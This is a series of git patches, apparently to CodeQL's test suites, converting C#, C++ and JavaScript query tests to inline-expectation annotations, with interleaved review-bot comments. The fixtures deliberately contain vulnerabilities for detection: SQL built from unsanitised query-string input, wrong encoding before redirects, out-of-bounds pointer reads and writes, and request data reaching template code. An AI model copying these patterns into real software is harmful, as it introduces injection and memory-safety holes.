@@ -52,8 +52,8 @@ public void Html(string value, Label label, System.Windows.Forms.HtmlElement htm public void Url(string value, HttpServerUtility util, HttpContext ctx) { // BAD - var encodedValue = HttpUtility.HtmlEncode(value); - ctx.Response.Redirect(encodedValue); + var encodedValue = HttpUtility.HtmlEncode(value); // $ Source[cs/inappropriate-encoding]=r10 + ctx.Response.Redirect(encodedValue); // $ Alert[cs/inappropriate-encoding]=r10 // GOOD ctx.Response.Redirect(HttpUtility.UrlEncode(encodedValue)); @@ -63,6 +63,6 @@ public void Url(string value, HttpServerUtility util, HttpContext ctx) static string Encode(string value) { - return value.Replace("\"", "\\\""); + return value.Replace("\"", "\\\""); // $ Source[cs/inappropriate-encoding]=r3 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref index d70d82f47195..99348351479a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/InappropriateEncoding.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-838/InappropriateEncoding.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs index dd3731cb1613..1e55ade7a9de 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/SqlEncode.cs 
@@ -11,8 +11,8 @@ public static DataSet Bad(HttpContext ctx) var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); using (var connection = new SqlConnection("")) { - var query = "select * from Users where Name='" + user.Replace("\"", "\"\"") + "'"; - var adapter = new SqlDataAdapter(query, connection); + var query = "select * from Users where Name='" + user.Replace("\"", "\"\"") + "'"; // $ Source[cs/inappropriate-encoding]=r11 + var adapter = new SqlDataAdapter(query, connection); // $ Alert[cs/inappropriate-encoding]=r11 var result = new DataSet(); adapter.Fill(result); return result; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs b/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs index c43ec2b675a8..303a807a577d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-838/UrlEncode.cs @@ -7,7 +7,7 @@ public class UrlEncode public static void Bad(string value, HttpContext ctx) { var user = WebUtility.UrlDecode(ctx.Request.QueryString["user"]); - ctx.Response.Redirect("?param=" + WebUtility.HtmlEncode(user)); + ctx.Response.Redirect("?param=" + WebUtility.HtmlEncode(user)); // $ Alert[cs/inappropriate-encoding]=r12 $ Alert[cs/inappropriate-encoding]=r12 } public static void Good(string value, HttpContext ctx) From 1d5f8e3254f290f49f2a888563d82dad0b175c1a Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:40:42 +0000 Subject: [PATCH 12/15] Convert C++ qlref tests to inline expectations --- .../UnsafeUseOfThis/UnsafeUseOfThis.qlref | 1 + .../Critical/UnsafeUseOfThis/test.cpp | 16 +-- ...UncheckedReturnValueForTimeFunctions.qlref | 1 + .../test.cpp | 12 +- .../CWE/CWE-193/InvalidPointerDeref.qlref | 1 + .../query-tests/Security/CWE/CWE-193/test.cpp | 112 +++++++++--------- 6 files changed, 73 insertions(+), 70 deletions(-) 
diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref index 9c104719c2c0..1bd76706524d 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/UnsafeUseOfThis.qlref @@ -1 +1,2 @@ query: Likely Bugs/OO/UnsafeUseOfThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp index 900418b20ea8..d74cbd39b486 100644 --- a/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp +++ b/cpp/ql/test/query-tests/Critical/UnsafeUseOfThis/test.cpp @@ -4,35 +4,35 @@ struct B; void call_f(B*); struct B : public A { - B() { + B() { // $ Source[cpp/unsafe-use-of-this]=r4 call_f(this); } B(B& b) { - b.f(); // BAD: undefined behavior + b.f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r1 } - ~B() { - f(); // BAD: undefined behavior + ~B() { // $ Source[cpp/unsafe-use-of-this]=r2 + f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r2 } }; struct C : public B { - C(bool b) { + C(bool b) { // $ Source[cpp/unsafe-use-of-this]=r3 Source[cpp/unsafe-use-of-this]=r5 call_f(this); if(b) { - this->f(); // BAD: undefined behavior + this->f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r3 } } }; struct D : public B { - D() : B(*this) {} + D() : B(*this) {} // $ Source[cpp/unsafe-use-of-this]=r1 }; void call_f(B* x) { - x->f(); // 2 x BAD: Undefined behavior + x->f(); // 2 x BAD: Undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r4 Alert[cpp/unsafe-use-of-this]=r5 } struct E : public A { 
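Review bot: In this hunk the expectation is appended after an existing prose comment (`b.f(); // BAD: undefined behavior // $ Alert[cpp/unsafe-use-of-this]=r1`, likewise in `~B`, `C(bool)` and `call_f`). The CWE-193 test in the same commit puts the `$` part first and the prose after it (`// $ deref=L5->L6 Alert[cpp/invalid-pointer-deref]=r1 // BAD`). As far as I know an expectation comment is recognised only when its text starts with `$`, so these four alerts may not be matched to their comments; please confirm against the test run. Reordering avoids the question: `b.f(); // $ Alert[cpp/unsafe-use-of-this]=r1 // BAD: undefined behavior`. `struct E` at the end of the hunk continues outside it.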
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref index d453e0c83be4..8dfe8a5c1e1e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref @@ -1 +1,2 @@ query: Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp index 6e0320e8d84d..7a0b176f8bf9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/test.cpp @@ -422,7 +422,7 @@ void AntiPattern_unchecked_filetime_conversion2a() st.wYear += 2; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -440,7 +440,7 @@ void AntiPattern_unchecked_filetime_conversion2b() st.wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** 
@@ -456,7 +456,7 @@ void AntiPattern_unchecked_filetime_conversion2b(SYSTEMTIME* st) st->wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] // BUG - UncheckedReturnValueForTimeFunctions - SystemTimeToFileTime(st, &ft); + SystemTimeToFileTime(st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -950,7 +950,7 @@ void tp_intermediaryVar(struct timespec now, struct logtime ×tamp_remote) // BUG - UncheckedLeapYearAfterYearModification st.wYear = st.wYear + 1; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -968,7 +968,7 @@ void tp_intermediaryVar(struct timespec now, struct logtime ×tamp_remote) // BUG - UncheckedLeapYearAfterYearModification st.wYear++; // $ Alert[cpp/leap-year/unchecked-after-arithmetic-year-modification] - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } /** @@ -1032,7 +1032,7 @@ void fp_daymonth_guard(){ st.wDay = st.wMonth == 2 && st.wDay == 29 ? 28 : st.wDay; - SystemTimeToFileTime(&st, &ft); + SystemTimeToFileTime(&st, &ft); // $ Alert[cpp/leap-year/unchecked-return-value-for-time-conversion-function] } void increment_arg(WORD &x){ diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref index 75e8699aaac2..d252615f6827 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref @@ -1 +1,2 @@ query: Security/CWE/CWE-193/InvalidPointerDeref.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp index db1017e233fe..f26d67738223 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/test.cpp @@ -1,11 +1,11 @@ using size_t = decltype(sizeof 0); void* malloc(size_t size); void test1(int size) { - char* p = (char*)malloc(size); + char* p = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r1 Source[cpp/invalid-pointer-deref]=r2 char* q = p + size; // $ alloc=L4 - char a = *q; // $ deref=L5->L6 // BAD + char a = *q; // $ deref=L5->L6 Alert[cpp/invalid-pointer-deref]=r1 // BAD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L5->L8+1 // BAD + char c = *(q + 1); // $ deref=L5->L8+1 Alert[cpp/invalid-pointer-deref]=r2 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] @@ -13,11 +13,11 @@ void test1(int size) { } void test2(int size) { - char* p = (char*)malloc(size); + char* p = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r3 char* q = p + size - 1; // $ alloc=L16 char a = *q; // GOOD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L17->L20 // BAD + char c = *(q + 1); // $ deref=L17->L20 Alert[cpp/invalid-pointer-deref]=r3 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] 
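Review bot: The lines in `test1` that the file itself labels `// BAD [NOT DETECTED]` (`*(q + size)` and `*(q + size + 1)`) stay as prose while the detected dereferences gain `Alert[cpp/invalid-pointer-deref]` tags, so the known false negatives of this out-of-bounds query are still not machine-checked. Inline expectations have a `MISSING:` prefix for this, e.g. `char d = *(q + size); // $ MISSING: Alert[cpp/invalid-pointer-deref] // BAD`, which makes the test change visibly once the query starts catching the case. The same applies to the `[NOT DETECTED]` lines in the `test2` and `test3` hunks. `test1` ends outside this hunk.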
@@ -25,11 +25,11 @@ void test2(int size) { } void test3(int size) { - char* p = (char*)malloc(size + 1); + char* p = (char*)malloc(size + 1); // $ Source[cpp/invalid-pointer-deref]=r4 Source[cpp/invalid-pointer-deref]=r5 char* q = p + (size + 1); // $ alloc=L28+1 - char a = *q; // $ deref=L29->L30 // BAD + char a = *q; // $ deref=L29->L30 Alert[cpp/invalid-pointer-deref]=r4 // BAD char b = *(q - 1); // GOOD - char c = *(q + 1); // $ deref=L29->L32+1 // BAD + char c = *(q + 1); // $ deref=L29->L32+1 Alert[cpp/invalid-pointer-deref]=r5 // BAD char d = *(q + size); // BAD [NOT DETECTED] char e = *(q - size); // GOOD char f = *(q + size + 1); // BAD [NOT DETECTED] @@ -49,7 +49,7 @@ void test4(int size) { } char* mk_array(int size, char** end) { - char* begin = (char*)malloc(size); + char* begin = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r6 *end = begin + size; // $ alloc=L52 return begin; @@ -64,7 +64,7 @@ void test5(int size) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L53->L62->L67 deref=L53->L66->L67 // BAD + *p = 0; // $ deref=L53->L62->L67 deref=L53->L66->L67 Alert[cpp/invalid-pointer-deref]=r6 // BAD } for (char* p = begin; p < end; ++p) { @@ -202,7 +202,7 @@ void test12(unsigned len, unsigned index) { } void test13(unsigned len, unsigned index) { - char* p = (char *)malloc(len); + char* p = (char *)malloc(len); // $ Source[cpp/invalid-pointer-deref]=r7 char* end = p + len; // $ alloc=L205 char* q = p + index; @@ -210,7 +210,7 @@ void test13(unsigned len, unsigned index) { return; } - *q = '\0'; // $ deref=L206->L213 // BAD + *q = '\0'; // $ deref=L206->L213 Alert[cpp/invalid-pointer-deref]=r7 // BAD } bool unknown(); 
@@ -257,21 +257,21 @@ void test17(unsigned *p, unsigned x, unsigned k) { void test17(unsigned len) { - int *xs = new int[len]; + int *xs = new int[len]; // $ Source[cpp/invalid-pointer-deref]=r8 int *end = xs + len; // $ alloc=L260 for (int *x = xs; x <= end; x++) { - int i = *x; // $ deref=L261->L264 // BAD + int i = *x; // $ deref=L261->L264 Alert[cpp/invalid-pointer-deref]=r8 // BAD } } void test18(unsigned len) { - int *xs = new int[len]; + int *xs = new int[len]; // $ Source[cpp/invalid-pointer-deref]=r9 int *end = xs + len; // $ alloc=L270 for (int *x = xs; x <= end; x++) { - *x = 0; // $ deref=L271->L274 // BAD + *x = 0; // $ deref=L271->L274 Alert[cpp/invalid-pointer-deref]=r9 // BAD } } @@ -352,11 +352,11 @@ void test24(unsigned size) { } void test25(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r10 Source[cpp/invalid-pointer-deref]=r11 char *end = xs + size; // $ alloc=L355 char *end_plus_one = end + 1; - int val1 = *end_plus_one; // $ deref=L356->L358+1 // BAD - int val2 = *(end_plus_one + 1); // $ deref=L356->L359+2 // BAD + int val1 = *end_plus_one; // $ deref=L356->L358+1 Alert[cpp/invalid-pointer-deref]=r10 // BAD + int val2 = *(end_plus_one + 1); // $ deref=L356->L359+2 Alert[cpp/invalid-pointer-deref]=r11 // BAD } void test26(unsigned size) { @@ -374,14 +374,14 @@ void test26(unsigned size) { } void test27(unsigned size, bool b) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r12 char *end = xs + size; // $ alloc=L377 if (b) { end++; } - int val = *end; // $ deref=L378->L384+1 // BAD + int val = *end; // $ deref=L378->L384+1 Alert[cpp/invalid-pointer-deref]=r12 // BAD } void test28(unsigned size) { 
@@ -407,47 +407,47 @@ void test28_simple(unsigned size) { } void test28_simple2(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r13 char *end = &xs[size]; // $ alloc=L410 if (xs < end) { xs++; if (xs < end + 1) { - xs[0] = 0; // $ deref=L411->L415 // BAD + xs[0] = 0; // $ deref=L411->L415 Alert[cpp/invalid-pointer-deref]=r13 // BAD } } } void test28_simple3(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r14 char *end = &xs[size]; // $ alloc=L421 if (xs < end) { xs++; if (xs - 1 < end) { - xs[0] = 0; // $ deref=L422->L426 // BAD + xs[0] = 0; // $ deref=L422->L426 Alert[cpp/invalid-pointer-deref]=r14 // BAD } } } void test28_simple4(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r15 char *end = &xs[size]; // $ alloc=L432 if (xs < end) { end++; xs++; if (xs < end) { - xs[0] = 0; // $ deref=L433->L438 // BAD + xs[0] = 0; // $ deref=L433->L438 Alert[cpp/invalid-pointer-deref]=r15 // BAD } } } void test28_simple5(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r16 char *end = &xs[size]; // $ alloc=L444 end++; if (xs < end) { xs++; if (xs < end) { - xs[0] = 0; // $ deref=L445->L450 // BAD + xs[0] = 0; // $ deref=L445->L450 Alert[cpp/invalid-pointer-deref]=r16 // BAD } } } @@ -477,13 +477,13 @@ void test28_simple7(unsigned size) { } void test28_simple8(unsigned size) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r17 char *end = &xs[size]; // $ alloc=L480 end += 500; if (xs < end) { xs++; if (xs < end - 1) { - xs[0] = 0; // $ deref=L481->L486+498 // BAD + xs[0] = 0; // $ deref=L481->L486+498 Alert[cpp/invalid-pointer-deref]=r17 // BAD } } } 
@@ -540,23 +540,23 @@ void test31_simple1(unsigned size, unsigned src_pos) void test31_simple2(unsigned size, unsigned src_pos) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r18 if (src_pos > size) { src_pos = size; } if (src_pos < size + 1) { - xs[src_pos] = 0; // $ alloc=L543 deref=L548 // BAD + xs[src_pos] = 0; // $ alloc=L543 deref=L548 Alert[cpp/invalid-pointer-deref]=r18 // BAD } } void test31_simple3(unsigned size, unsigned src_pos) { - char *xs = new char[size]; + char *xs = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r19 if (src_pos > size) { src_pos = size; } if (src_pos - 1 < size) { - xs[src_pos] = 0; // $ alloc=L554 deref=L559 // BAD + xs[src_pos] = 0; // $ alloc=L554 deref=L559 Alert[cpp/invalid-pointer-deref]=r19 // BAD } } @@ -639,12 +639,12 @@ void test31_simple5_plus1(unsigned size, unsigned src_pos) void test31_simple1_sub1(unsigned size, unsigned src_pos) { - char *xs = new char[size - 1]; + char *xs = new char[size - 1]; // $ Source[cpp/invalid-pointer-deref]=r20 if (src_pos > size) { src_pos = size; } if (src_pos < size) { - xs[src_pos] = 0; // $ alloc=L642-1 deref=L647 // BAD + xs[src_pos] = 0; // $ alloc=L642-1 deref=L647 Alert[cpp/invalid-pointer-deref]=r20 // BAD } } @@ -727,10 +727,10 @@ void test21_simple(bool b) { } void test36(unsigned size, unsigned n) { - int* p = new int[size + 2]; + int* p = new int[size + 2]; // $ Source[cpp/invalid-pointer-deref]=r21 if(n < size + 1) { int* end = p + (n + 2); // $ alloc=L730+2 - *end = 0; // $ deref=L732->L733 // BAD + *end = 0; // $ deref=L732->L733 Alert[cpp/invalid-pointer-deref]=r21 // BAD } } 
@@ -751,7 +751,7 @@ void error(const char * msg) { } void test38(unsigned size) { - char * alloc = new char[size]; + char * alloc = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r22 Source[cpp/invalid-pointer-deref]=r23 Source[cpp/invalid-pointer-deref]=r24 Source[cpp/invalid-pointer-deref]=r25 unsigned pos = 0; while (pos < size) { @@ -764,12 +764,12 @@ void test38(unsigned size) { case '0': if (n != 1) error(""); - char x = alloc[pos + 1]; // $ alloc=L754 deref=L767 // GOOD [FALSE POSITIVE] + char x = alloc[pos + 1]; // $ alloc=L754 deref=L767 Alert[cpp/invalid-pointer-deref]=r22 Alert[cpp/invalid-pointer-deref]=r23 // GOOD [FALSE POSITIVE] break; case '1': if (n != 2) error(""); - char a = alloc[pos + 1]; // $ alloc=L754 deref=L772 // GOOD [FALSE POSITIVE] + char a = alloc[pos + 1]; // $ alloc=L754 deref=L772 Alert[cpp/invalid-pointer-deref]=r24 Alert[cpp/invalid-pointer-deref]=r25 // GOOD [FALSE POSITIVE] char b = alloc[pos + 2]; break; } @@ -778,19 +778,19 @@ void test38(unsigned size) { } void test38_simple(unsigned size, unsigned pos, unsigned numParams) { - char * p = new char[size]; + char * p = new char[size]; // $ Source[cpp/invalid-pointer-deref]=r26 if (pos < size) { if (pos + numParams < size) { if (numParams == 1) { - char x = p[pos + 1]; // $ alloc=L781 deref=L786 // GOOD [FALSE POSITIVE] + char x = p[pos + 1]; // $ alloc=L781 deref=L786 Alert[cpp/invalid-pointer-deref]=r26 // GOOD [FALSE POSITIVE] } } } } void mk_array_no_field_flow(int size, char** begin, char** end) { - *begin = (char*)malloc(size); + *begin = (char*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r27 Source[cpp/invalid-pointer-deref]=r28 *end = *begin + size; // $ alloc=L793 } 
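Review bot: The new `Alert[cpp/invalid-pointer-deref]` tags `r22` to `r25` in `test38` sit on lines labelled `// GOOD [FALSE POSITIVE]` but are written as ordinary expectations, whereas `test15_with_malloc` and `test16_with_malloc` later in this file put the same kind of result behind `SPURIOUS:`. As written, the false positives read as intended findings. Mirroring the later functions, the first line would become `char x = alloc[pos + 1]; // $ SPURIOUS: alloc=L754 deref=L767 Alert[cpp/invalid-pointer-deref]=r22 Alert[cpp/invalid-pointer-deref]=r23 // GOOD [FALSE POSITIVE]`, with the same change for the `case '1'` line and for the `r26` line of `test38_simple` in the following hunk. The `switch` in `test38` starts before this hunk, so the guard conditions that make these reads safe are only partly visible here.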
@@ -804,7 +804,7 @@ void test6_no_field_flow(int size) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L794->L802->L807 deref=L794->L806->L807 // BAD + *p = 0; // $ deref=L794->L802->L807 deref=L794->L806->L807 Alert[cpp/invalid-pointer-deref]=r27 // BAD } for (char* p = begin; p < end; ++p) { @@ -818,7 +818,7 @@ void test7_callee_no_field_flow(char* begin, char* end) { } for (char* p = begin; p <= end; ++p) { - *p = 0; // $ deref=L794->L815->L821 deref=L794->L816->L821 deref=L794->L820->L821 // BAD + *p = 0; // $ deref=L794->L815->L821 deref=L794->L816->L821 deref=L794->L820->L821 Alert[cpp/invalid-pointer-deref]=r28 // BAD } for (char* p = begin; p < end; ++p) { @@ -838,26 +838,26 @@ void test15_with_malloc(size_t index) { if(size < index) { return; } - int* newname = (int*)malloc(size); - newname[index] = 0; // $ SPURIOUS: alloc=L841 deref=L842 // GOOD [FALSE POSITIVE] + int* newname = (int*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r29 + newname[index] = 0; // $ SPURIOUS: alloc=L841 deref=L842 Alert[cpp/invalid-pointer-deref]=r29 // GOOD [FALSE POSITIVE] } void test16_with_malloc(size_t index) { size_t size = index + 13; if(size >= index) { - int* newname = (int*)malloc(size); - newname[index] = 0; // $ SPURIOUS: alloc=L848 deref=L849 // GOOD [FALSE POSITIVE] + int* newname = (int*)malloc(size); // $ Source[cpp/invalid-pointer-deref]=r30 + newname[index] = 0; // $ SPURIOUS: alloc=L848 deref=L849 Alert[cpp/invalid-pointer-deref]=r30 // GOOD [FALSE POSITIVE] } } # define MyMalloc(size) malloc(((size) == 0 ? 1 : (size))) void test_regression(size_t size) { - int* p = (int*)MyMalloc(size + 1); + int* p = (int*)MyMalloc(size + 1); // $ Source[cpp/invalid-pointer-deref]=r31 int* chend = p + (size + 1); // $ alloc=L856+1 if(p <= chend) { - *p = 42; // $ deref=L857->L860 // BAD + *p = 42; // $ deref=L857->L860 Alert[cpp/invalid-pointer-deref]=r31 // BAD } } 
@@ -865,7 +865,7 @@ void test_regression(size_t size) { void* g_malloc(size_t size); void test17(int size) { - char* p = (char*)g_malloc(size); + char* p = (char*)g_malloc(size); // $ Source[cpp/invalid-pointer-deref]=r32 char* q = p + size; // $ alloc=L868 - char a = *q; // $ deref=L869->L870 // BAD -} \ No newline at end of file + char a = *q; // $ deref=L869->L870 Alert[cpp/invalid-pointer-deref]=r32 // BAD +} From 93898f5ee1c9d09b73317bef3655ba6d2724f9c8 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 21:54:26 +0000 Subject: [PATCH 13/15] Convert JavaScript CodeInjection test to inline expectations --- .../frameworks/Templating/CodeInjection.qlref | 1 + .../frameworks/Templating/app.js | 26 +++++++++---------- .../Templating/views/angularjs_include.ejs | 4 +-- .../Templating/views/angularjs_sinks.ejs | 4 +-- .../frameworks/Templating/views/ejs_sinks.ejs | 6 ++--- .../frameworks/Templating/views/hbs_sinks.hbs | 6 ++--- .../frameworks/Templating/views/njk_sinks.njk | 10 +++---- 7 files changed, 29 insertions(+), 28 deletions(-) diff --git a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref index 8783ddb3a8a6..bfeec8aec393 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref +++ b/javascript/ql/test/library-tests/frameworks/Templating/CodeInjection.qlref @@ -1 +1,2 @@ query: Security/CWE-094/CodeInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/library-tests/frameworks/Templating/app.js b/javascript/ql/test/library-tests/frameworks/Templating/app.js index 8666d79b644f..2822d40be5c1 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/app.js +++ b/javascript/ql/test/library-tests/frameworks/Templating/app.js 
@@ -12,11 +12,11 @@ app.get('/ejs', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, }); }); @@ -31,11 +31,11 @@ app.get('/hbs', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, }); }); 
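Review bot: `dataInGeneratedCodeRaw` and `dataInEventHandlerStringRaw` get no `// $ Source` in the `/ejs` and `/hbs` routes here, while the `/njk` route in the next hunk marks both fields as sources, and nothing records whether that difference is intended. Both variants place `req.query` data inside generated script code, so an unannotated line can be misread as a safe pattern. If the unescaped `<%- %>` and `{{{ }}}` sinks are deliberately left to another query, a trailing note on the two lines such as `// raw interpolation: not expected from CodeInjection` would say so; if it is a known gap, the corresponding sink lines in `ejs_sinks.ejs` and `hbs_sinks.hbs` could carry `// $ MISSING: Alert` instead. Both `res.render` calls begin before their hunks.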
@@ -50,20 +50,20 @@ app.get('/njk', (req, res) => { }, dataInStringLiteral: req.query.dataInStringLiteral, dataInStringLiteralRaw: req.query.dataInStringLiteralRaw, - dataInGeneratedCode: req.query.dataInGeneratedCode, - dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, + dataInGeneratedCode: req.query.dataInGeneratedCode, // $ Source + dataInGeneratedCodeRaw: req.query.dataInGeneratedCodeRaw, // $ Source dataInGeneratedCodeJsonRaw: req.query.dataInGeneratedCodeJsonRaw, - backslashSink1: req.query.backslashSink1, + backslashSink1: req.query.backslashSink1, // $ Source backslashSink2: req.query.backslashSink2, - dataInEventHandlerString: req.query.dataInEventHandlerString, - dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, + dataInEventHandlerString: req.query.dataInEventHandlerString, // $ Source + dataInEventHandlerStringRaw: req.query.dataInEventHandlerStringRaw, // $ Source }); }); app.get('/angularjs', (req, res) => { res.render('angularjs_sinks', { - escapedHtml: req.query.escapedHtml, - rawHtml: req.query.rawHtml, + escapedHtml: req.query.escapedHtml, // $ Source + rawHtml: req.query.rawHtml, // $ Source }); }); diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs index 2d02e173275f..e9a6f436a8fe 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_include.ejs @@ -1,5 +1,5 @@
    - <%= escapedHtml %> - <%- rawHtml %> + <%= escapedHtml %> + <%- rawHtml %>
